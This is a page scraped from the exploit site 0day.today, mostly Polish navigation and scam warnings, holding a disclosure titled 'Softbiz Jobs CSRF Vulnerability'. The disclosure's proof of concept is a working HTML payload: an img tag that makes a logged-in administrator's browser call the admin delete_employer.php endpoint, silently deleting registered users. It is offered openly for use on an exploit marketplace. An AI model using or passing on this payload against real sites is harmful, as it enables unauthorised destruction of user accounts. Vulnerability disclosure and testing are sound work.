0day.today - Największa Baza Exploitów na Świecie.
Informacje które powinieneś wiedzieć o 0day.today:
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyć GOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Softbiz Jobs CSRF Vulnerability
Autor
Ryzyko
[
Nieskategoryzowane Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
=============================== Softbiz Jobs CSRF Vulnerability =============================== ======================================================================= Softbiz Jobs CSRF Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Admin module # company aksitservices # Credit by Pratul Agrawal # Download http://www.softbizscripts.com/ # Script softbizscripts # Proof of concept Script to delete the registered user through Cross Site request forgery ................................................................................................................... <html> <body> <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> </body> </html> ................................................................................................................... After execution refresh teh page and u can see that user having id=20 get deleted automatically. #If you have any questions, comments, or concerns, feel free to contact me. # 0day.today [2024-04-25] #